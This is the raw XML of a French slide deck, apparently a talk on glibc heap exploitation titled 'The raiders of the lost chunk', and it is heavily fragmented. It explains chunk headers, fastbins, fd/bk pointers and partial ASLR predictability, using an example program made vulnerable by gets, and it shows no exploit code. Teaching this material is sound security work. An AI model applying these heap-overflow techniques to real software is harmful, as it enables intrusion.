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79"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId80"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="331" r:id="rId9"/>
    <p:sldId id="330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0" r:id="rId18"/>
    <p:sldId id="269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83" r:id="rId27"/>
    <p:sldId id="282" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="284" r:id="rId30"/>
    <p:sldId id="288" r:id="rId31"/>
    <p:sldId id="291" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="293" r:id="rId35"/>
    <p:sldId id="335" r:id="rId36"/>
    <p:sldId id="279" r:id="rId37"/>
    <p:sldId id="285" r:id="rId38"/>
    <p:sldId id="286" r:id="rId39"/>
    <p:sldId id="294" r:id="rId40"/>
    <p:sldId id="295" r:id="rId41"/>
    <p:sldId id="296" r:id="rId42"/>
    <p:sldId id="297" r:id="rId43"/>
    <p:sldId id="298" r:id="rId44"/>
    <p:sldId id="334" r:id="rId45"/>
    <p:sldId id="299" r:id="rId46"/>
    <p:sldId id="300" r:id="rId47"/>
    <p:sldId id="303" r:id="rId48"/>
    <p:sldId id="304" r:id="rId49"/>
    <p:sldId id="305" r:id="rId50"/>
    <p:sldId id="337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2" r:id="rId75"/>
    <p:sldId id="333" r:id="rId76"/>
    <p:sldId id="336" r:id="rId77"/>
    <p:sldId id="261" r:id="rId78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6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041" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="1134" y="9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100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="28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5FB9A08-40BC-47B5-8130-616BDCF09507}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/04/2019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45ACAF8E-318A-4EFE-8633-D9E72ABCE0ED}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr algn="r"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655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082B9BC8-1895-4EB7-B2E1-D3911C69AD0C}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de l’image des diapositives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5EE2CF44-2B13-41B4-A334-1CDF534EEBB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5385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2CF44-2B13-41B4-A334-1CDF534EEBBF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0021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Introduction:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> - de quoi parle ton ? La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> utilisé par les opérations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc,free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et en C++ new/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>delete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2CF44-2B13-41B4-A334-1CDF534EEBBF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6767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Les 12 derniers bits de l’ASLR ne sont pas aléatoire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les blocs mémoire seront toujours alloué dans le même ordre sur le tas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p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2CF44-2B13-41B4-A334-1CDF534EEBBF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2543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err="1"/>
              <a:t>Allocated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une taille et trois flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La taille du header varie selon l’architecture 32 bits (8 octets) et 64 bits (16 octets)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La taille minimum d’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> dépend de l’architecture 8 / 16.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cas d’exemple sur une architecture 32 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1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2CF44-2B13-41B4-A334-1CDF534EEBBF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4985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err="1"/>
              <a:t>Fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> utilisée que lorsque le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> dépasse une certaines tailles sinon uniquement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est utilisé (c’est un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ne pointe pas directement sur le prochain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> libre, il pointe sur une structure de deux pointeurs qui indique le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>précedent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et prochain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> libre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>main_arena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p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2CF44-2B13-41B4-A334-1CDF534EEBBF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2673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Cas d’exemple :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Programme qui permet de gérer une collection de chapeau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Fonctionnalité : ajout, suppression, visualisation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2CF44-2B13-41B4-A334-1CDF534EEBBF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6583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Vulnérabilité triviale:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisation de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> pas de , pour initialisé le nom du chapeau, le nom du chapeau est défini par l’utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"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2CF44-2B13-41B4-A334-1CDF534EEBBF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0384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/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="2825016"/>
            <a:ext cx="12188952" cy="3180930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="0" y="3075709"/>
            <a:ext cx="12188952" cy="263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 bwMode="white">
          <a:xfrm>
            <a:off x="1066800" y="3165763"/>
            <a:ext cx="10058400" cy="1711037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white">
          <a:xfrm>
            <a:off x="1066800" y="4953000"/>
            <a:ext cx="10058400" cy="685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0AE1499-D871-4B5A-815F-37F8E0C46F8C}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019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1943100" cy="5638801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24000" y="457199"/>
            <a:ext cx="7048500" cy="5638801"/>
          </a:xfrm>
        </p:spPr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CFD53AE-A1A9-4971-B817-D6F393C7FE35}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019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4EA85BC-BD2B-458E-8340-8D31B4F152AE}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019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828800"/>
            <a:ext cx="9144000" cy="2743200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0">
              <a:defRPr sz="5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9144000" cy="1506537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l" rtl="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" algn="l" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" algn="l" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" algn="l" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" indent="0" algn="l" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" indent="0" algn="l" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" indent="0" algn="l" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" indent="0" algn="l" rtl="0">
              <a:buNone/>
              <a:defRPr sz="16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43400" cy="4270375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4343400" cy="4270375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C9DB741-A3C2-4C75-A4D1-97F129BE9491}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019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27048" y="1828800"/>
            <a:ext cx="4343400" cy="685800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527048" y="2514600"/>
            <a:ext cx="4343400" cy="35814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327648" y="1828800"/>
            <a:ext cx="4343400" cy="685800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327648" y="2514600"/>
            <a:ext cx="4343400" cy="35814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1B59C61-65A8-4FB6-8060-9ACE25B631CB}" type="datetime1">
              <a:rPr lang="fr-FR" noProof="0" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" noProof="0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31375A4-56A4-47D6-9801-1991572033F7}" type="slidenum">
              <a:rPr lang="fr-FR" noProof="0" smtClean="0"/>
              <a:pPr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19C7B91-9FE1-44A2-8FAA-E998ADCC26EE}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019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4294901-3B67-4101-8D94-E7F6C7A7004D}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0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02587" y="1600200"/>
            <a:ext cx="3122613" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0">
              <a:defRPr sz="340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0412" y="762000"/>
            <a:ext cx="6400800" cy="53340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001039" y="3429000"/>
            <a:ext cx="3124161" cy="18288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6311718-BEC8-4DB8-9B0A-52986EABC5C9}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019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blackWhite">
          <a:xfrm>
            <a:off x="644091" y="640080"/>
            <a:ext cx="6675120" cy="5577840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="1016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600" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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7997952" y="1600200"/>
            <a:ext cx="3127248" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0">
              <a:defRPr sz="340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pour l’image 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781251" y="777240"/>
            <a:ext cx="6400800" cy="5303520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="45720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997952" y="3429000"/>
            <a:ext cx="3127248" cy="18288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83871E-5D80-4EDF-9E01-94E184402302}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019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8610600" y="6362700"/>
            <a:ext cx="9906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A9F01D7A-F2CA-4D89-BC48-D8C829AA64E1}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14/04/2019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524000" y="6362700"/>
            <a:ext cx="6881553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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9829800" y="6362700"/>
            <a:ext cx="8382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algn="r"/>
            <a:fld id="{E31375A4-56A4-47D6-9801-1991572033F7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1508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317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060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www.tomtombinary.xyz/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tomtombinary" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Tomtombinary" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.root-me.org/Tomtombinary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repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Glibc_Adventures-The_Forgotten_Chunks.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc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0x00sec.org/t/heap-exploitation-fastbin-attack/3627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fr-FR" dirty="0" err="1"/>
              <a:t>Binary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> exploitation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fr-FR" dirty="0"/>
              <a:t>The raiders of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk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129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Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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t="14870" r="1997"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524001" y="1600200"/>
            <a:ext cx="4499992" cy="494696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r="337" b="15156"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6115691" y="1600200"/>
            <a:ext cx="5164885" cy="4752528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flèche : chevron 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900B797F-D003-437E-B6F0-48F80441B8E1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Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0057BBC5-8D93-491C-A7E0-C971613E9B3C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8" name="Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667DE127-127D-4B37-932E-CE2E4FBD8A3C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139DEB74-DBBC-4DB6-964C-8571BE3FAC29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386426A4-44AC-4170-8ECC-0C94B42018A9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8D4B24F9-0754-47EC-A645-BDCB18414CCA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A3A15F3-6355-4DB8-9B27-B1533F35B871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2885326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Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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t="14870"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1600200"/>
            <a:ext cx="4591691" cy="494696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b="15156"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6115691" y="1600200"/>
            <a:ext cx="5182323" cy="47525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72064" y="5229200"/>
            <a:ext cx="2736304" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA408D2-FF91-48AD-BFCA-7CC421D6598E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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{802F8473-96CE-4EAD-86E5-D488D7410999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0EB49014-8AFC-4E30-A57F-18B7882F2CE4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2C899ECF-A6C2-4D13-8EAF-B6BBDC181678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B5CCFC43-B5C1-4C4E-A4F7-D3FDE04C2463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12" name="Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A67233C5-C44D-429C-BE13-CFC3BAD09870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D829945-7D81-419B-A89F-C6D3BC401779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2750673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Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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700808"/>
            <a:ext cx="3874933" cy="10801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25226" y="2996952"/>
            <a:ext cx="1149880" cy="7200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red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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775106" y="2996952"/>
            <a:ext cx="1149880" cy="7200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white </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat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b="14281"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5515441" y="1700808"/>
            <a:ext cx="6268321" cy="4104456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1EF170A-48DD-4905-A21B-5992E711F08B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0BFE6802-3B01-47D2-91CA-B6EE97149433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D30E072E-6AA5-4495-94DF-EEC981283D19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187991B6-F88B-49C3-A4C4-49652027BBA8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Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA2F1F25-18C0-4750-B48D-6E7CFFF1CDF4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13" name="Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C95F2D62-DF9D-4EDA-9E91-5BAB85AF22C9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B39A402-C166-4102-A3A5-058D478651AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103308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Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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625226" y="2996952"/>
            <a:ext cx="1149880" cy="720080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red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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775106" y="2996952"/>
            <a:ext cx="1149880" cy="7200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white </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat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992" y="1700808"/>
            <a:ext cx="2304256" cy="48443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A062153-80BD-4751-8FF1-4021BA198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1700808"/>
            <a:ext cx="3874933" cy="1080120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEBC6AE6-D2B2-45C2-87BE-0BAA5DCAD2B4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7E7AC576-F3F3-4ED9-B4F5-578E7D3E1D20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A9432D81-8C90-439A-A27A-24A70477367A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836CF404-9436-4E79-9ACA-C8F5B693A9FA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Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE256837-B5EC-4C6B-B13D-78C61FAAD6E9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13" name="Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA68E72-1FF7-4C6C-9701-B1DB1FFD55E5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B038579-88AE-4A90-B3AE-8C989AB70F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1940552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Trivial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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625226" y="2996952"/>
            <a:ext cx="1149880" cy="7200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green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775106" y="2996952"/>
            <a:ext cx="1149880" cy="7200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white </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat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383"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4653592" y="2996952"/>
            <a:ext cx="7480342" cy="3312368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flèche droite 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2775106" y="3212976"/>
            <a:ext cx="728606" cy="28803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E359BF5-5879-417B-8E06-10CF5FCD1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1700808"/>
            <a:ext cx="3874933" cy="1080120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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AF2A62AA-96CD-4EC8-8DE5-6F417E7FA89C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E968795B-C16E-4F99-9E2D-116ED5905DCA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12" name="Flèche : chevron 11">
            <a:extLst>
